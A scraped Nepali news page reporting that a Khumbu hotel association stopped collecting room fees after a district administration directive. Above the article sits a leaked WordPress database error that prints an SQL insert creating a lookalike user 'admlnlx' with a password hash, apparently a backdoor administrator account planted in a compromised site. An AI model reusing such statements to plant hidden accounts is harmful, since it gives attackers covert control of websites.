WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDA1eLgBsZmrzn26HEd7oBD2h7581d0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 00:46:14', '', 'admlnlx', 'admlnlx')

प्रशासनको निर्देशन पछि खुम्बुमा एशोसियसनले लिने शुल्क रोक्यो – Gaule Khabar

प्रशासनको निर्देशन पछि खुम्बुमा एशोसियसनले लिने शुल्क रोक्यो

प्रशासनको निर्देशन पछि खुम्बुमा एशोसियसनले लिने शुल्क रोक्यो

गाउँले न्यूज, ३० चैत्र । जिल्ला प्रशासन कार्यालय सोलुखुम्बुको कडा निर्देशन पछि खुम्बु क्षेत्रमा होटल एशोसियसनले लिदै आएको शुल्क होटल आफैले लिने भएका छन् । होटल व्यवसायिहरुको आग्रहमा होटल एशोसियसनले उठाएको दावी गर्ने एशोसियसनले अब देखी शुल्क नलिने खुम्बुपासाङल्हामु गाउँपालिका प्रमुख ङिमदोर्जी शेर्पाले जानकारी दिए ।
अध्यक्षका अनुसार अस्वस्थ प्रतिस्पर्धाको अन्त्य गर्नकोलागि एशोसियसन खडा गरि कोठा भाडा लिने र महिनाको अन्तिम दिन सम्पुर्ण व्यवसायी जम्मा भई बाडफाड गर्ने कार्य गरिएको थियो । उक्त संस्था जिल्ला प्रशासन कार्यालय सोलुखुम्बुमानै दर्ता भएको भएपनि गाउँपाकिाले शुल्क लिने नलिने बिषयमा कुनैपनि अनुमति नदिएको जनाए ।
होटल एसोसियसनको विधानमा भने यस्ता कुनैपनि शुल्क लिने बिषयमा स्पष्ट उल्लेख भएको छैन । कुनैपनि संघसंस्थाले कोठा भाडा या विभिन्न बहानामा जोकोही संग रकम लिनु गैह्रकानुनी कार्य भएको भन्दै सोलुखुम्बुका प्रमुख जिल्ला अधिकारीले त्यस्तो पाईए तत्काल पक्राउ गर्न आदेश दिएको थियो । रकम लिने कार्य तत्काल रोकी प्रशासनमा आउन एक हप्ताको समय दिएको भएपनि होटल एशोसियसनका कोहीपनि नआएपछि प्रशासनले कडा निर्देशन गरेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका